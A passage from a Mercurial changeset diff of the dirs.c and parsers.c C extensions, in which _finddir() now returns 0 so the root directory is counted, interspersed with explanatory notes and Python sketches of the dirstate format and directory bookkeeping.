util: make util.dirs() and util.finddirs() include root directory (API)...
Martin von Zweigbergk
r42915:d8e55c0c default
@@ -1,316 +1,319 @@ dirs.c
1 1 /*
2 2 dirs.c - dynamic directory diddling for dirstates
3 3
4 4 Copyright 2013 Facebook
5 5
6 6 This software may be used and distributed according to the terms of
7 7 the GNU General Public License, incorporated herein by reference.
8 8 */
9 9
10 10 #define PY_SSIZE_T_CLEAN
11 11 #include <Python.h>
12 12
13 13 #include "util.h"
14 14
15 15 #ifdef IS_PY3K
16 16 #define PYLONG_VALUE(o) ((PyLongObject *)o)->ob_digit[1]
17 17 #else
18 18 #define PYLONG_VALUE(o) PyInt_AS_LONG(o)
19 19 #endif
20 20
21 21 /*
22 22 * This is a multiset of directory names, built from the files that
23 23 * appear in a dirstate or manifest.
24 24 *
25 25 * A few implementation notes:
26 26 *
27 27 * We modify Python integers for refcounting, but those integers are
28 28 * never visible to Python code.
29 29 *
30 30 * We mutate strings in-place, but leave them immutable once they can
31 31 * be seen by Python code.
32 32 */
33 33 typedef struct {
34 34 PyObject_HEAD
35 35 PyObject *dict;
36 36 } dirsObject;
37 37
38 38 static inline Py_ssize_t _finddir(const char *path, Py_ssize_t pos)
39 39 {
40 40 while (pos != -1) {
41 41 if (path[pos] == '/')
42 42 break;
43 43 pos -= 1;
44 44 }
45 if (pos == -1) {
46 return 0;
47 }
45 48
46 49 return pos;
47 50 }
48 51
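The three added lines above are the crux of this changeset: when no '/' remains, _finddir() now returns 0 (the length of the empty root prefix) instead of -1, so the prefix loop in _addpath() below also visits the repository root ''. The pure-Python counterpart would gain a trailing yield of '' along these lines (a sketch of the intended semantics, not the verbatim util.finddirs source):

    def finddirs(path):
        # Yield each ancestor directory of path, longest first, now
        # ending with the repository root ''.
        pos = path.rfind('/')
        while pos != -1:
            yield path[:pos]
            pos = path.rfind('/', 0, pos)
        yield ''  # new: the root directory is always included

    list(finddirs('a/b/c'))  # -> ['a/b', 'a', '']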
49 52 static int _addpath(PyObject *dirs, PyObject *path)
50 53 {
51 54 const char *cpath = PyBytes_AS_STRING(path);
52 55 Py_ssize_t pos = PyBytes_GET_SIZE(path);
53 56 PyObject *key = NULL;
54 57 int ret = -1;
55 58
56 59 /* This loop is super critical for performance. That's why we inline
57 60 * access to Python structs instead of going through a supported API.
58 61 * The implementation, therefore, is heavily dependent on CPython
59 62 * implementation details. We also commit violations of the Python
60 63 * "protocol" such as mutating immutable objects. But since we only
61 64 * mutate objects created in this function or in other well-defined
62 65 * locations, the references are known so these violations should go
63 66 * unnoticed. The code for adjusting the length of a PyBytesObject is
64 67 * essentially a minimal version of _PyBytes_Resize. */
65 68 while ((pos = _finddir(cpath, pos - 1)) != -1) {
66 69 PyObject *val;
67 70
68 71 /* It's likely that every prefix already has an entry
69 72 in our dict. Try to avoid allocating and
70 73 deallocating a string for each prefix we check. */
71 74 if (key != NULL)
72 75 ((PyBytesObject *)key)->ob_shash = -1;
73 76 else {
74 77 /* Force Python to not reuse a small shared string. */
75 78 key = PyBytes_FromStringAndSize(cpath,
76 79 pos < 2 ? 2 : pos);
77 80 if (key == NULL)
78 81 goto bail;
79 82 }
80 83 /* Py_SIZE(o) refers to the ob_size member of the struct. Yes,
81 84 * assigning to what looks like a function seems wrong. */
82 85 Py_SIZE(key) = pos;
83 86 ((PyBytesObject *)key)->ob_sval[pos] = '\0';
84 87
85 88 val = PyDict_GetItem(dirs, key);
86 89 if (val != NULL) {
87 90 PYLONG_VALUE(val) += 1;
88 91 break;
89 92 }
90 93
91 94 /* Force Python to not reuse a small shared int. */
92 95 #ifdef IS_PY3K
93 96 val = PyLong_FromLong(0x1eadbeef);
94 97 #else
95 98 val = PyInt_FromLong(0x1eadbeef);
96 99 #endif
97 100
98 101 if (val == NULL)
99 102 goto bail;
100 103
101 104 PYLONG_VALUE(val) = 1;
102 105 ret = PyDict_SetItem(dirs, key, val);
103 106 Py_DECREF(val);
104 107 if (ret == -1)
105 108 goto bail;
106 109 Py_CLEAR(key);
107 110 }
108 111 ret = 0;
109 112
110 113 bail:
111 114 Py_XDECREF(key);
112 115
113 116 return ret;
114 117 }
115 118
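The loop above maintains the invariant sketched in the header comment: each directory's count is the number of direct children recorded beneath it, which is why an increment (and the matching decrement in _delpath() below) can stop as soon as it reaches a prefix that already exists (or still has other children). A hypothetical pure-Python model of the same bookkeeping, reusing the finddirs() sketch above (the real fallback is class dirs in mercurial/util.py):

    class dirsmultiset(object):
        def __init__(self):
            self._dirs = {}  # directory -> number of direct children seen

        def addpath(self, path):
            dirs = self._dirs
            for base in finddirs(path):
                if base in dirs:
                    # Shorter prefixes were already counted when 'base'
                    # first appeared, so one increment suffices - this
                    # mirrors the increment-and-break in _addpath().
                    dirs[base] += 1
                    return
                dirs[base] = 1

        def delpath(self, path):
            dirs = self._dirs
            for base in finddirs(path):
                # a KeyError here corresponds to the ValueError
                # raised by _delpath() on a missing entry
                if dirs[base] > 1:
                    dirs[base] -= 1
                    return
                del dirs[base]

        def __contains__(self, d):
            return d in self._dirs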
116 119 static int _delpath(PyObject *dirs, PyObject *path)
117 120 {
118 121 char *cpath = PyBytes_AS_STRING(path);
119 122 Py_ssize_t pos = PyBytes_GET_SIZE(path);
120 123 PyObject *key = NULL;
121 124 int ret = -1;
122 125
123 126 while ((pos = _finddir(cpath, pos - 1)) != -1) {
124 127 PyObject *val;
125 128
126 129 key = PyBytes_FromStringAndSize(cpath, pos);
127 130
128 131 if (key == NULL)
129 132 goto bail;
130 133
131 134 val = PyDict_GetItem(dirs, key);
132 135 if (val == NULL) {
133 136 PyErr_SetString(PyExc_ValueError,
134 137 "expected a value, found none");
135 138 goto bail;
136 139 }
137 140
138 141 if (--PYLONG_VALUE(val) <= 0) {
139 142 if (PyDict_DelItem(dirs, key) == -1)
140 143 goto bail;
141 144 } else
142 145 break;
143 146 Py_CLEAR(key);
144 147 }
145 148 ret = 0;
146 149
147 150 bail:
148 151 Py_XDECREF(key);
149 152
150 153 return ret;
151 154 }
152 155
153 156 static int dirs_fromdict(PyObject *dirs, PyObject *source, char skipchar)
154 157 {
155 158 PyObject *key, *value;
156 159 Py_ssize_t pos = 0;
157 160
158 161 while (PyDict_Next(source, &pos, &key, &value)) {
159 162 if (!PyBytes_Check(key)) {
160 163 PyErr_SetString(PyExc_TypeError, "expected string key");
161 164 return -1;
162 165 }
163 166 if (skipchar) {
164 167 if (!dirstate_tuple_check(value)) {
165 168 PyErr_SetString(PyExc_TypeError,
166 169 "expected a dirstate tuple");
167 170 return -1;
168 171 }
169 172 if (((dirstateTupleObject *)value)->state == skipchar)
170 173 continue;
171 174 }
172 175
173 176 if (_addpath(dirs, key) == -1)
174 177 return -1;
175 178 }
176 179
177 180 return 0;
178 181 }
179 182
180 183 static int dirs_fromiter(PyObject *dirs, PyObject *source)
181 184 {
182 185 PyObject *iter, *item = NULL;
183 186 int ret;
184 187
185 188 iter = PyObject_GetIter(source);
186 189 if (iter == NULL)
187 190 return -1;
188 191
189 192 while ((item = PyIter_Next(iter)) != NULL) {
190 193 if (!PyBytes_Check(item)) {
191 194 PyErr_SetString(PyExc_TypeError, "expected string");
192 195 break;
193 196 }
194 197
195 198 if (_addpath(dirs, item) == -1)
196 199 break;
197 200 Py_CLEAR(item);
198 201 }
199 202
200 203 ret = PyErr_Occurred() ? -1 : 0;
201 204 Py_DECREF(iter);
202 205 Py_XDECREF(item);
203 206 return ret;
204 207 }
205 208
206 209 /*
207 210 * Calculate a refcounted set of directory names for the files in a
208 211 * dirstate.
209 212 */
210 213 static int dirs_init(dirsObject *self, PyObject *args)
211 214 {
212 215 PyObject *dirs = NULL, *source = NULL;
213 216 char skipchar = 0;
214 217 int ret = -1;
215 218
216 219 self->dict = NULL;
217 220
218 221 if (!PyArg_ParseTuple(args, "|Oc:__init__", &source, &skipchar))
219 222 return -1;
220 223
221 224 dirs = PyDict_New();
222 225
223 226 if (dirs == NULL)
224 227 return -1;
225 228
226 229 if (source == NULL)
227 230 ret = 0;
228 231 else if (PyDict_Check(source))
229 232 ret = dirs_fromdict(dirs, source, skipchar);
230 233 else if (skipchar)
231 234 PyErr_SetString(PyExc_ValueError,
232 235 "skip character is only supported "
233 236 "with a dict source");
234 237 else
235 238 ret = dirs_fromiter(dirs, source);
236 239
237 240 if (ret == -1)
238 241 Py_XDECREF(dirs);
239 242 else
240 243 self->dict = dirs;
241 244
242 245 return ret;
243 246 }
244 247
245 248 PyObject *dirs_addpath(dirsObject *self, PyObject *args)
246 249 {
247 250 PyObject *path;
248 251
249 252 if (!PyArg_ParseTuple(args, "O!:addpath", &PyBytes_Type, &path))
250 253 return NULL;
251 254
252 255 if (_addpath(self->dict, path) == -1)
253 256 return NULL;
254 257
255 258 Py_RETURN_NONE;
256 259 }
257 260
258 261 static PyObject *dirs_delpath(dirsObject *self, PyObject *args)
259 262 {
260 263 PyObject *path;
261 264
262 265 if (!PyArg_ParseTuple(args, "O!:delpath", &PyBytes_Type, &path))
263 266 return NULL;
264 267
265 268 if (_delpath(self->dict, path) == -1)
266 269 return NULL;
267 270
268 271 Py_RETURN_NONE;
269 272 }
270 273
271 274 static int dirs_contains(dirsObject *self, PyObject *value)
272 275 {
273 276 return PyBytes_Check(value) ? PyDict_Contains(self->dict, value) : 0;
274 277 }
275 278
276 279 static void dirs_dealloc(dirsObject *self)
277 280 {
278 281 Py_XDECREF(self->dict);
279 282 PyObject_Del(self);
280 283 }
281 284
282 285 static PyObject *dirs_iter(dirsObject *self)
283 286 {
284 287 return PyObject_GetIter(self->dict);
285 288 }
286 289
287 290 static PySequenceMethods dirs_sequence_methods;
288 291
289 292 static PyMethodDef dirs_methods[] = {
290 293 {"addpath", (PyCFunction)dirs_addpath, METH_VARARGS, "add a path"},
291 294 {"delpath", (PyCFunction)dirs_delpath, METH_VARARGS, "remove a path"},
292 295 {NULL} /* Sentinel */
293 296 };
294 297
295 298 static PyTypeObject dirsType = { PyVarObject_HEAD_INIT(NULL, 0) };
296 299
297 300 void dirs_module_init(PyObject *mod)
298 301 {
299 302 dirs_sequence_methods.sq_contains = (objobjproc)dirs_contains;
300 303 dirsType.tp_name = "parsers.dirs";
301 304 dirsType.tp_new = PyType_GenericNew;
302 305 dirsType.tp_basicsize = sizeof(dirsObject);
303 306 dirsType.tp_dealloc = (destructor)dirs_dealloc;
304 307 dirsType.tp_as_sequence = &dirs_sequence_methods;
305 308 dirsType.tp_flags = Py_TPFLAGS_DEFAULT;
306 309 dirsType.tp_doc = "dirs";
307 310 dirsType.tp_iter = (getiterfunc)dirs_iter;
308 311 dirsType.tp_methods = dirs_methods;
309 312 dirsType.tp_init = (initproc)dirs_init;
310 313
311 314 if (PyType_Ready(&dirsType) < 0)
312 315 return;
313 316 Py_INCREF(&dirsType);
314 317
315 318 PyModule_AddObject(mod, "dirs", (PyObject *)&dirsType);
316 319 }
@@ -1,762 +1,762 @@ parsers.c
1 1 /*
2 2 parsers.c - efficient content parsing
3 3
4 4 Copyright 2008 Matt Mackall <mpm@selenic.com> and others
5 5
6 6 This software may be used and distributed according to the terms of
7 7 the GNU General Public License, incorporated herein by reference.
8 8 */
9 9
10 10 #define PY_SSIZE_T_CLEAN
11 11 #include <Python.h>
12 12 #include <ctype.h>
13 13 #include <stddef.h>
14 14 #include <string.h>
15 15
16 16 #include "bitmanipulation.h"
17 17 #include "charencode.h"
18 18 #include "util.h"
19 19
20 20 #ifdef IS_PY3K
21 21 /* The mapping of Python types is meant to be temporary to get Python
22 22 * 3 to compile. We should remove this once Python 3 is fully
23 23 * supported and proper types are used in the extensions themselves. */
24 24 #define PyInt_Check PyLong_Check
25 25 #define PyInt_FromLong PyLong_FromLong
26 26 #define PyInt_FromSsize_t PyLong_FromSsize_t
27 27 #define PyInt_AsLong PyLong_AsLong
28 28 #endif
29 29
30 30 static const char *const versionerrortext = "Python minor version mismatch";
31 31
32 32 static PyObject *dict_new_presized(PyObject *self, PyObject *args)
33 33 {
34 34 Py_ssize_t expected_size;
35 35
36 36 if (!PyArg_ParseTuple(args, "n:make_presized_dict", &expected_size)) {
37 37 return NULL;
38 38 }
39 39
40 40 return _dict_new_presized(expected_size);
41 41 }
42 42
43 43 static inline dirstateTupleObject *make_dirstate_tuple(char state, int mode,
44 44 int size, int mtime)
45 45 {
46 46 dirstateTupleObject *t =
47 47 PyObject_New(dirstateTupleObject, &dirstateTupleType);
48 48 if (!t) {
49 49 return NULL;
50 50 }
51 51 t->state = state;
52 52 t->mode = mode;
53 53 t->size = size;
54 54 t->mtime = mtime;
55 55 return t;
56 56 }
57 57
58 58 static PyObject *dirstate_tuple_new(PyTypeObject *subtype, PyObject *args,
59 59 PyObject *kwds)
60 60 {
61 61 /* We do all the initialization here and not a tp_init function because
62 62 * dirstate_tuple is immutable. */
63 63 dirstateTupleObject *t;
64 64 char state;
65 65 int size, mode, mtime;
66 66 if (!PyArg_ParseTuple(args, "ciii", &state, &mode, &size, &mtime)) {
67 67 return NULL;
68 68 }
69 69
70 70 t = (dirstateTupleObject *)subtype->tp_alloc(subtype, 1);
71 71 if (!t) {
72 72 return NULL;
73 73 }
74 74 t->state = state;
75 75 t->mode = mode;
76 76 t->size = size;
77 77 t->mtime = mtime;
78 78
79 79 return (PyObject *)t;
80 80 }
81 81
82 82 static void dirstate_tuple_dealloc(PyObject *o)
83 83 {
84 84 PyObject_Del(o);
85 85 }
86 86
87 87 static Py_ssize_t dirstate_tuple_length(PyObject *o)
88 88 {
89 89 return 4;
90 90 }
91 91
92 92 static PyObject *dirstate_tuple_item(PyObject *o, Py_ssize_t i)
93 93 {
94 94 dirstateTupleObject *t = (dirstateTupleObject *)o;
95 95 switch (i) {
96 96 case 0:
97 97 return PyBytes_FromStringAndSize(&t->state, 1);
98 98 case 1:
99 99 return PyInt_FromLong(t->mode);
100 100 case 2:
101 101 return PyInt_FromLong(t->size);
102 102 case 3:
103 103 return PyInt_FromLong(t->mtime);
104 104 default:
105 105 PyErr_SetString(PyExc_IndexError, "index out of range");
106 106 return NULL;
107 107 }
108 108 }
109 109
110 110 static PySequenceMethods dirstate_tuple_sq = {
111 111 dirstate_tuple_length, /* sq_length */
112 112 0, /* sq_concat */
113 113 0, /* sq_repeat */
114 114 dirstate_tuple_item, /* sq_item */
115 115 0, /* sq_ass_item */
116 116 0, /* sq_contains */
117 117 0, /* sq_inplace_concat */
118 118 0 /* sq_inplace_repeat */
119 119 };
120 120
121 121 PyTypeObject dirstateTupleType = {
122 122 PyVarObject_HEAD_INIT(NULL, 0) /* header */
123 123 "dirstate_tuple", /* tp_name */
124 124 sizeof(dirstateTupleObject), /* tp_basicsize */
125 125 0, /* tp_itemsize */
126 126 (destructor)dirstate_tuple_dealloc, /* tp_dealloc */
127 127 0, /* tp_print */
128 128 0, /* tp_getattr */
129 129 0, /* tp_setattr */
130 130 0, /* tp_compare */
131 131 0, /* tp_repr */
132 132 0, /* tp_as_number */
133 133 &dirstate_tuple_sq, /* tp_as_sequence */
134 134 0, /* tp_as_mapping */
135 135 0, /* tp_hash */
136 136 0, /* tp_call */
137 137 0, /* tp_str */
138 138 0, /* tp_getattro */
139 139 0, /* tp_setattro */
140 140 0, /* tp_as_buffer */
141 141 Py_TPFLAGS_DEFAULT, /* tp_flags */
142 142 "dirstate tuple", /* tp_doc */
143 143 0, /* tp_traverse */
144 144 0, /* tp_clear */
145 145 0, /* tp_richcompare */
146 146 0, /* tp_weaklistoffset */
147 147 0, /* tp_iter */
148 148 0, /* tp_iternext */
149 149 0, /* tp_methods */
150 150 0, /* tp_members */
151 151 0, /* tp_getset */
152 152 0, /* tp_base */
153 153 0, /* tp_dict */
154 154 0, /* tp_descr_get */
155 155 0, /* tp_descr_set */
156 156 0, /* tp_dictoffset */
157 157 0, /* tp_init */
158 158 0, /* tp_alloc */
159 159 dirstate_tuple_new, /* tp_new */
160 160 };
161 161
162 162 static PyObject *parse_dirstate(PyObject *self, PyObject *args)
163 163 {
164 164 PyObject *dmap, *cmap, *parents = NULL, *ret = NULL;
165 165 PyObject *fname = NULL, *cname = NULL, *entry = NULL;
166 166 char state, *cur, *str, *cpos;
167 167 int mode, size, mtime;
168 168 unsigned int flen, pos = 40;
169 169 Py_ssize_t len = 40;
170 170 Py_ssize_t readlen;
171 171
172 172 if (!PyArg_ParseTuple(
173 173 args, PY23("O!O!s#:parse_dirstate", "O!O!y#:parse_dirstate"),
174 174 &PyDict_Type, &dmap, &PyDict_Type, &cmap, &str, &readlen)) {
175 175 goto quit;
176 176 }
177 177
178 178 len = readlen;
179 179
180 180 /* read parents */
181 181 if (len < 40) {
182 182 PyErr_SetString(PyExc_ValueError,
183 183 "too little data for parents");
184 184 goto quit;
185 185 }
186 186
187 187 parents = Py_BuildValue(PY23("s#s#", "y#y#"), str, (Py_ssize_t)20,
188 188 str + 20, (Py_ssize_t)20);
189 189 if (!parents) {
190 190 goto quit;
191 191 }
192 192
193 193 /* read filenames */
194 194 while (pos >= 40 && pos < len) {
195 195 if (pos + 17 > len) {
196 196 PyErr_SetString(PyExc_ValueError,
197 197 "overflow in dirstate");
198 198 goto quit;
199 199 }
200 200 cur = str + pos;
201 201 /* unpack header */
202 202 state = *cur;
203 203 mode = getbe32(cur + 1);
204 204 size = getbe32(cur + 5);
205 205 mtime = getbe32(cur + 9);
206 206 flen = getbe32(cur + 13);
207 207 pos += 17;
208 208 cur += 17;
209 209 if (flen > len - pos) {
210 210 PyErr_SetString(PyExc_ValueError,
211 211 "overflow in dirstate");
212 212 goto quit;
213 213 }
214 214
215 215 entry =
216 216 (PyObject *)make_dirstate_tuple(state, mode, size, mtime);
217 217 cpos = memchr(cur, 0, flen);
218 218 if (cpos) {
219 219 fname = PyBytes_FromStringAndSize(cur, cpos - cur);
220 220 cname = PyBytes_FromStringAndSize(
221 221 cpos + 1, flen - (cpos - cur) - 1);
222 222 if (!fname || !cname ||
223 223 PyDict_SetItem(cmap, fname, cname) == -1 ||
224 224 PyDict_SetItem(dmap, fname, entry) == -1) {
225 225 goto quit;
226 226 }
227 227 Py_DECREF(cname);
228 228 } else {
229 229 fname = PyBytes_FromStringAndSize(cur, flen);
230 230 if (!fname ||
231 231 PyDict_SetItem(dmap, fname, entry) == -1) {
232 232 goto quit;
233 233 }
234 234 }
235 235 Py_DECREF(fname);
236 236 Py_DECREF(entry);
237 237 fname = cname = entry = NULL;
238 238 pos += flen;
239 239 }
240 240
241 241 ret = parents;
242 242 Py_INCREF(ret);
243 243 quit:
244 244 Py_XDECREF(fname);
245 245 Py_XDECREF(cname);
246 246 Py_XDECREF(entry);
247 247 Py_XDECREF(parents);
248 248 return ret;
249 249 }
250 250
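parse_dirstate() decodes the v1 on-disk format: two 20-byte parent hashes, then variable-length records consisting of a 17-byte header (one state byte plus four big-endian 32-bit fields) followed by flen bytes of file name, which may contain a NUL separating the name from a copy source. A minimal Python sketch of the same layout (illustrative only; it assumes well-formed input and skips the bounds checks done above):

    import struct

    def parse_dirstate_py(data):
        p1, p2 = data[:20], data[20:40]
        pos, entries, copies = 40, {}, {}
        while pos < len(data):
            state = data[pos:pos + 1]
            mode, size, mtime, flen = struct.unpack('>iiiI',
                                                    data[pos + 1:pos + 17])
            pos += 17
            name = data[pos:pos + flen]
            pos += flen
            if b'\0' in name:
                name, source = name.split(b'\0', 1)
                copies[name] = source
            entries[name] = (state, mode, size, mtime)
        return (p1, p2), entries, copies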
251 251 /*
252 252 * Build a set of non-normal and other parent entries from the dirstate dmap
253 253 */
254 254 static PyObject *nonnormalotherparententries(PyObject *self, PyObject *args)
255 255 {
256 256 PyObject *dmap, *fname, *v;
257 257 PyObject *nonnset = NULL, *otherpset = NULL, *result = NULL;
258 258 Py_ssize_t pos;
259 259
260 260 if (!PyArg_ParseTuple(args, "O!:nonnormalentries", &PyDict_Type,
261 261 &dmap)) {
262 262 goto bail;
263 263 }
264 264
265 265 nonnset = PySet_New(NULL);
266 266 if (nonnset == NULL) {
267 267 goto bail;
268 268 }
269 269
270 270 otherpset = PySet_New(NULL);
271 271 if (otherpset == NULL) {
272 272 goto bail;
273 273 }
274 274
275 275 pos = 0;
276 276 while (PyDict_Next(dmap, &pos, &fname, &v)) {
277 277 dirstateTupleObject *t;
278 278 if (!dirstate_tuple_check(v)) {
279 279 PyErr_SetString(PyExc_TypeError,
280 280 "expected a dirstate tuple");
281 281 goto bail;
282 282 }
283 283 t = (dirstateTupleObject *)v;
284 284
285 285 if (t->state == 'n' && t->size == -2) {
286 286 if (PySet_Add(otherpset, fname) == -1) {
287 287 goto bail;
288 288 }
289 289 }
290 290
291 291 if (t->state == 'n' && t->mtime != -1) {
292 292 continue;
293 293 }
294 294 if (PySet_Add(nonnset, fname) == -1) {
295 295 goto bail;
296 296 }
297 297 }
298 298
299 299 result = Py_BuildValue("(OO)", nonnset, otherpset);
300 300 if (result == NULL) {
301 301 goto bail;
302 302 }
303 303 Py_DECREF(nonnset);
304 304 Py_DECREF(otherpset);
305 305 return result;
306 306 bail:
307 307 Py_XDECREF(nonnset);
308 308 Py_XDECREF(otherpset);
309 309 Py_XDECREF(result);
310 310 return NULL;
311 311 }
312 312
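Restated in Python, the classification above is: 'other parent' entries are state 'n' with size -2, and 'non-normal' entries are everything that is not state 'n' with a known mtime. A hypothetical helper, assuming dmap maps file names to (state, mode, size, mtime) tuples:

    def nonnormalotherparent_py(dmap):
        nonnormal = {f for f, (state, mode, size, mtime) in dmap.items()
                     if state != 'n' or mtime == -1}
        otherparent = {f for f, (state, mode, size, mtime) in dmap.items()
                       if state == 'n' and size == -2}
        return nonnormal, otherparent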
313 313 /*
314 314 * Efficiently pack a dirstate object into its on-disk format.
315 315 */
316 316 static PyObject *pack_dirstate(PyObject *self, PyObject *args)
317 317 {
318 318 PyObject *packobj = NULL;
319 319 PyObject *map, *copymap, *pl, *mtime_unset = NULL;
320 320 Py_ssize_t nbytes, pos, l;
321 321 PyObject *k, *v = NULL, *pn;
322 322 char *p, *s;
323 323 int now;
324 324
325 325 if (!PyArg_ParseTuple(args, "O!O!O!i:pack_dirstate", &PyDict_Type, &map,
326 326 &PyDict_Type, &copymap, &PyTuple_Type, &pl,
327 327 &now)) {
328 328 return NULL;
329 329 }
330 330
331 331 if (PyTuple_Size(pl) != 2) {
332 332 PyErr_SetString(PyExc_TypeError, "expected 2-element tuple");
333 333 return NULL;
334 334 }
335 335
336 336 /* Figure out how much we need to allocate. */
337 337 for (nbytes = 40, pos = 0; PyDict_Next(map, &pos, &k, &v);) {
338 338 PyObject *c;
339 339 if (!PyBytes_Check(k)) {
340 340 PyErr_SetString(PyExc_TypeError, "expected string key");
341 341 goto bail;
342 342 }
343 343 nbytes += PyBytes_GET_SIZE(k) + 17;
344 344 c = PyDict_GetItem(copymap, k);
345 345 if (c) {
346 346 if (!PyBytes_Check(c)) {
347 347 PyErr_SetString(PyExc_TypeError,
348 348 "expected string key");
349 349 goto bail;
350 350 }
351 351 nbytes += PyBytes_GET_SIZE(c) + 1;
352 352 }
353 353 }
354 354
355 355 packobj = PyBytes_FromStringAndSize(NULL, nbytes);
356 356 if (packobj == NULL) {
357 357 goto bail;
358 358 }
359 359
360 360 p = PyBytes_AS_STRING(packobj);
361 361
362 362 pn = PyTuple_GET_ITEM(pl, 0);
363 363 if (PyBytes_AsStringAndSize(pn, &s, &l) == -1 || l != 20) {
364 364 PyErr_SetString(PyExc_TypeError, "expected a 20-byte hash");
365 365 goto bail;
366 366 }
367 367 memcpy(p, s, l);
368 368 p += 20;
369 369 pn = PyTuple_GET_ITEM(pl, 1);
370 370 if (PyBytes_AsStringAndSize(pn, &s, &l) == -1 || l != 20) {
371 371 PyErr_SetString(PyExc_TypeError, "expected a 20-byte hash");
372 372 goto bail;
373 373 }
374 374 memcpy(p, s, l);
375 375 p += 20;
376 376
377 377 for (pos = 0; PyDict_Next(map, &pos, &k, &v);) {
378 378 dirstateTupleObject *tuple;
379 379 char state;
380 380 int mode, size, mtime;
381 381 Py_ssize_t len, l;
382 382 PyObject *o;
383 383 char *t;
384 384
385 385 if (!dirstate_tuple_check(v)) {
386 386 PyErr_SetString(PyExc_TypeError,
387 387 "expected a dirstate tuple");
388 388 goto bail;
389 389 }
390 390 tuple = (dirstateTupleObject *)v;
391 391
392 392 state = tuple->state;
393 393 mode = tuple->mode;
394 394 size = tuple->size;
395 395 mtime = tuple->mtime;
396 396 if (state == 'n' && mtime == now) {
397 397 /* See pure/parsers.py:pack_dirstate for why we do
398 398 * this. */
399 399 mtime = -1;
400 400 mtime_unset = (PyObject *)make_dirstate_tuple(
401 401 state, mode, size, mtime);
402 402 if (!mtime_unset) {
403 403 goto bail;
404 404 }
405 405 if (PyDict_SetItem(map, k, mtime_unset) == -1) {
406 406 goto bail;
407 407 }
408 408 Py_DECREF(mtime_unset);
409 409 mtime_unset = NULL;
410 410 }
411 411 *p++ = state;
412 412 putbe32((uint32_t)mode, p);
413 413 putbe32((uint32_t)size, p + 4);
414 414 putbe32((uint32_t)mtime, p + 8);
415 415 t = p + 12;
416 416 p += 16;
417 417 len = PyBytes_GET_SIZE(k);
418 418 memcpy(p, PyBytes_AS_STRING(k), len);
419 419 p += len;
420 420 o = PyDict_GetItem(copymap, k);
421 421 if (o) {
422 422 *p++ = '\0';
423 423 l = PyBytes_GET_SIZE(o);
424 424 memcpy(p, PyBytes_AS_STRING(o), l);
425 425 p += l;
426 426 len += l + 1;
427 427 }
428 428 putbe32((uint32_t)len, t);
429 429 }
430 430
431 431 pos = p - PyBytes_AS_STRING(packobj);
432 432 if (pos != nbytes) {
433 433 PyErr_Format(PyExc_SystemError, "bad dirstate size: %ld != %ld",
434 434 (long)pos, (long)nbytes);
435 435 goto bail;
436 436 }
437 437
438 438 return packobj;
439 439 bail:
440 440 Py_XDECREF(mtime_unset);
441 441 Py_XDECREF(packobj);
442 442 Py_XDECREF(v);
443 443 return NULL;
444 444 }
445 445
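The mtime == now branch deserves a note: if a file's recorded mtime equals the timestamp of the dirstate write itself, an edit later in that same second would be undetectable, so the entry is stored with mtime -1 ("unset") to force the next status run to compare contents. The referenced pure-Python logic amounts to something like this (a sketch, not the verbatim pure/parsers.py code):

    def clearambiguousmtimes(dmap, now):
        # Entries whose mtime equals 'now' could still change within the
        # same second; store -1 so the next status call rechecks them.
        for f, (state, mode, size, mtime) in list(dmap.items()):
            if state == 'n' and mtime == now:
                dmap[f] = (state, mode, size, -1)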
446 446 #define BUMPED_FIX 1
447 447 #define USING_SHA_256 2
448 448 #define FM1_HEADER_SIZE (4 + 8 + 2 + 2 + 1 + 1 + 1)
449 449
450 450 static PyObject *readshas(const char *source, unsigned char num,
451 451 Py_ssize_t hashwidth)
452 452 {
453 453 int i;
454 454 PyObject *list = PyTuple_New(num);
455 455 if (list == NULL) {
456 456 return NULL;
457 457 }
458 458 for (i = 0; i < num; i++) {
459 459 PyObject *hash = PyBytes_FromStringAndSize(source, hashwidth);
460 460 if (hash == NULL) {
461 461 Py_DECREF(list);
462 462 return NULL;
463 463 }
464 464 PyTuple_SET_ITEM(list, i, hash);
465 465 source += hashwidth;
466 466 }
467 467 return list;
468 468 }
469 469
470 470 static PyObject *fm1readmarker(const char *databegin, const char *dataend,
471 471 uint32_t *msize)
472 472 {
473 473 const char *data = databegin;
474 474 const char *meta;
475 475
476 476 double mtime;
477 477 int16_t tz;
478 478 uint16_t flags;
479 479 unsigned char nsuccs, nparents, nmetadata;
480 480 Py_ssize_t hashwidth = 20;
481 481
482 482 PyObject *prec = NULL, *parents = NULL, *succs = NULL;
483 483 PyObject *metadata = NULL, *ret = NULL;
484 484 int i;
485 485
486 486 if (data + FM1_HEADER_SIZE > dataend) {
487 487 goto overflow;
488 488 }
489 489
490 490 *msize = getbe32(data);
491 491 data += 4;
492 492 mtime = getbefloat64(data);
493 493 data += 8;
494 494 tz = getbeint16(data);
495 495 data += 2;
496 496 flags = getbeuint16(data);
497 497 data += 2;
498 498
499 499 if (flags & USING_SHA_256) {
500 500 hashwidth = 32;
501 501 }
502 502
503 503 nsuccs = (unsigned char)(*data++);
504 504 nparents = (unsigned char)(*data++);
505 505 nmetadata = (unsigned char)(*data++);
506 506
507 507 if (databegin + *msize > dataend) {
508 508 goto overflow;
509 509 }
510 510 dataend = databegin + *msize; /* narrow down to marker size */
511 511
512 512 if (data + hashwidth > dataend) {
513 513 goto overflow;
514 514 }
515 515 prec = PyBytes_FromStringAndSize(data, hashwidth);
516 516 data += hashwidth;
517 517 if (prec == NULL) {
518 518 goto bail;
519 519 }
520 520
521 521 if (data + nsuccs * hashwidth > dataend) {
522 522 goto overflow;
523 523 }
524 524 succs = readshas(data, nsuccs, hashwidth);
525 525 if (succs == NULL) {
526 526 goto bail;
527 527 }
528 528 data += nsuccs * hashwidth;
529 529
530 530 if (nparents == 1 || nparents == 2) {
531 531 if (data + nparents * hashwidth > dataend) {
532 532 goto overflow;
533 533 }
534 534 parents = readshas(data, nparents, hashwidth);
535 535 if (parents == NULL) {
536 536 goto bail;
537 537 }
538 538 data += nparents * hashwidth;
539 539 } else {
540 540 parents = Py_None;
541 541 Py_INCREF(parents);
542 542 }
543 543
544 544 if (data + 2 * nmetadata > dataend) {
545 545 goto overflow;
546 546 }
547 547 meta = data + (2 * nmetadata);
548 548 metadata = PyTuple_New(nmetadata);
549 549 if (metadata == NULL) {
550 550 goto bail;
551 551 }
552 552 for (i = 0; i < nmetadata; i++) {
553 553 PyObject *tmp, *left = NULL, *right = NULL;
554 554 Py_ssize_t leftsize = (unsigned char)(*data++);
555 555 Py_ssize_t rightsize = (unsigned char)(*data++);
556 556 if (meta + leftsize + rightsize > dataend) {
557 557 goto overflow;
558 558 }
559 559 left = PyBytes_FromStringAndSize(meta, leftsize);
560 560 meta += leftsize;
